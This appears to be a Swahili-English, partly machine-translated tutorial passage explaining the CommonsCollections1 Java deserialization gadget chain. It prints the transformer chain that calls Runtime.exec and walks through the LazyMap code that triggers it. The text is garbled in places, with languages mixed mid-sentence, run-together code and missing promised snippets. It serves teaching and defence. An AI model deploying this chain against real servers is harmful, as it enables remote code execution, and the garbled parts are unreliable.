Ikiwa hujui chochote kuhusu java deserialization payloads inaweza kuwa ngumu kuelewa kwa nini hii code itatekeleza calc.
Kwanza kabisa unahitaji kujua kwamba Transformer katika Java ni kitu ambacho kinapokea darasa na kikibadilisha kuwa darasa tofauti.
Pia ni muhimu kujua kwamba payload inayotekelezwa hapa ni sawa na:
Hivyo, jinsi payload ya kwanza inavyowasilishwa ni sawa na zile "rahisi" one-liners?
Kwanza kabisa, unaweza kuona katika payload kwamba mnyororo (array) wa mabadiliko umeundwa:
String[] command = {"calc.exe"};finalTransformer[] transformers =newTransformer[]{//(1) - Get gadget Class (from Runtime class)newConstantTransformer(Runtime.class),//(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"newInvokerTransformer("getMethod",newClass[]{ String.class,Class[].class},newObject[]{"getRuntime",newClass[0]}),//(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime ojectnewInvokerTransformer("invoke",newClass[]{Object.class,Object[].class},newObject[]{null,newObject[0]}),//(4) - Use the Runtime object to call exec with arbitrary commandsnewInvokerTransformer("exec",newClass[]{String.class},command)};ChainedTransformer chainedTransformer =newChainedTransformer(transformers);
Ikiwa unasoma msimbo, utaona kwamba ikiwa kwa namna fulani unachanganya mabadiliko ya array, unaweza kuwa na uwezo wa kutekeleza amri zisizo na mipaka.
Katika sehemu ya mwisho ya payload unaweza kuona kwamba kitu cha Ramani kinaundwa. Kisha, kazi decorate inatekelezwa kutoka LazyMap na kitu cha ramani na waongofu waliounganishwa. Kutoka kwa msimbo ufuatao unaweza kuona kwamba hii itasababisha waongofu waliounganishwa kunakiliwa ndani ya sifa ya lazyMap.factory:
protectedLazyMap(Map map,Transformer factory) {super(map);if (factory ==null) {thrownewIllegalArgumentException("Factory must not be null");}this.factory= factory;}
Na kisha tamati kubwa inatekelezwa: lazyMap.get("anything");
Hii ni nambari ya kazi ya get:
publicObjectget(Object key) {if (map.containsKey(key) ==false) {Object value =factory.transform(key);map.put(key, value);return value;}returnmap.get(key);}
Na hii ni nambari ya kazi ya transform
publicObjecttransform(Object object) {for (int i =0; i <iTransformers.length; i++) {object = iTransformers[i].transform(object);}return object;}
Hivyo, kumbuka kwamba ndani ya factory tulikuwa tumehifadhi chainedTransformer na ndani ya transform kazi tunapitia mabadiliko yote yaliyofungamana na kutekeleza moja baada ya nyingine. Jambo la kufurahisha ni kwamba kila transformer inatumia objectkama ingizo na object ni matokeo kutoka kwa transformer ya mwisho iliyotekelezwa. Kwa hivyo, mabadiliko yote yanatekelezwa kwa kufungamana yanatekeleza payload mbaya.
Muhtasari
Mwisho, kutokana na jinsi lazyMap inavyosimamia transformers zilizofungamana ndani ya njia ya kupata, ni kana kwamba tunatekeleza msimbo ufuatao:
Note that here it ilielezwa gadgets used for the ComonsCollections1 payload. But it's left jinsi hii yote inaanza kutekelezwa. You can see here that ysoserial, in order to execute this payload, uses an AnnotationInvocationHandler object because wakati huu object inapata deserialized, it will ita the payload.get() function that will tekeleza payload yote.
Java Thread Sleep
This payload could be muhimu kubaini kama wavuti ina udhaifu kwani itatekeleza usingizi ikiwa ina.